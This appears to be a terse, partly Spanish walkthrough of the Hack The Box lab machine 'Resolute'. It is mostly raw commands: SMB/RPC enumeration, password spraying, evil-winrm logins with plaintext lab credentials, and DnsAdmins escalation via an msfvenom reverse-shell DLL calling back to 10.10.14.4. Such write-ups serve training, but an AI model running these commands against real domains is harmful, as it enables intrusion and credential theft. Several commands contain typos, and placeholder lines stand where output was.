Resolute

Resolute

May 14, 2024
HTB Windows

nmap -A -p- -oA resolute 10.10.10.169 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA resolute 10.10.10.169

nmap -sU -O -p- -oA resolute-udp 10.10.10.169

ping -c 1 10.10.10.169

ssh_command.

nmap -p- --open -T5 -v -n 10.10.10.169

echo "10.10.10.169 resolute.htb megabank.local" | sudo tee -a /etc/hosts

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.169 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -p53,88,135,389,445,464,593,6363268,3269,5985,9389 10.10.10.169 -oN targeted

ssh_command.

bc targeted -l rb

ssh_command.

crackmapexec smb 10.10.10.169

ssh_command.

smblclient -L 10.10.10.169 -N

ssh_command.

smbmap -H 10.10.10.169 -u 'null'

ssh_command.

rpcclient -U "" 10.10.10.169 -N -c "enumdomusers" | grep -oP '\[.*?\]' | grep -v '0x' | tr -d '[]' > users.txt

ssh_command.

rpcclient -U "" 10.10.10.169 -N -c "enumdomgroups"

rpcclient -U "" 10.10.10.169 -N -c "enumdomgroupmem 0x200"

ssh_command.

rpcclient -U "" 10.10.10.169 -N -c 'queryuser 0x1f4'

ssh_command.

rpcclient -U "" 10.10.10.169 -N -c 'querydispinfo'

ssh_command.

cat passwords.txt

ssh_command.

GetNPUsers megabank.local/ -no-pass -usersfile users.txt

ssh_command.

crackmapexec smb 10.10.10.169 -u users.txt -p passwords.txt

ssh_command.

crackmapexec winrm 10.10.10.169 -u 'melanie' -p 'Welcome123!'

ssh_command.

evil-winrm -i 10.10.10.169 -u 'melanie' -p 'Welcome123!'

whoami

cd Desktop

type user.txt

ssh_command.

whoami /priv

ssh_command.

net user melanie

Vemos que melanie es parte del grupo Remote Management User

ssh_command.

dir -Force

ssh_command.

cd PSTranscripts

dir -Force

ssh_command.

type PowerShell_transcript.RESOLUTE.OjuoGBhU.20191203063201.txt | Select-String Admin

ssh_command.

crackmapexec smb 10.10.10.169 -u 'ryan' -p 'Serv3r4Admin4cc123!'

crackmapexec winrm 10.10.10.169 -u 'ryan' -p 'Serv3r4Admin4cc123!'

ssh_command.

evil-winrm -i 10.10.10.169 -u 'ryan' -p 'Serv3r4Admin4cc123!'

whoami /priv

ssh_command.

net user ryan

ssh_command.

whoami /all

ssh_command.

net localgroup

ssh_command.

net localgroup DnsAdmins

ssh_command. Vemos que Contractors esta en ese grupo DnsAdmins

Nos dirigimos a https://lolbas-project.github.io/#dns

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f dll -o pwned.dll

ssh_command.

smbserver.py smbFolder $(pwd) -smb2support

ssh_command.

dnscmd.exe /config /serverlevelplugindll \\10.10.14.4\smbFolder\pwned.dll

sudo rlwrap nc -lvnp 443

ssh_command.

Hacer estos comandos varias veces

sc.exe stop dns

sc.exe start dns

Cuando le salga esto es que se ejecuto con exito

ssh_command.

Ya tenemos un reverse shell

whoami

type C:\Users\Administrator\Desktop\root.txt

ssh_command.